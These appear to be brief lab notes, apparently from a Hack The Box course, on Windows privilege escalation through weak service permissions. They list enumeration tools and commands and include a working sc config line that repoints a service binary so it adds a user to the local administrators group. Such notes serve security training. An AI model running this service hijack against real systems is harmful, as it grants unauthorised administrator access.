To check service binaries suffering from weak ACLs:
https://github.com/GhostPack/SharpUp/
Use icacl to check permissions. (https://ss64.com/nt/icacls.html)
To check permissions on a service:
accesschk.exe /accepteula -quvcw WindscribeService
Patch a service:
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
We can search weak service ACLs in registry.
accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\\System\\CurrentControlSet\\services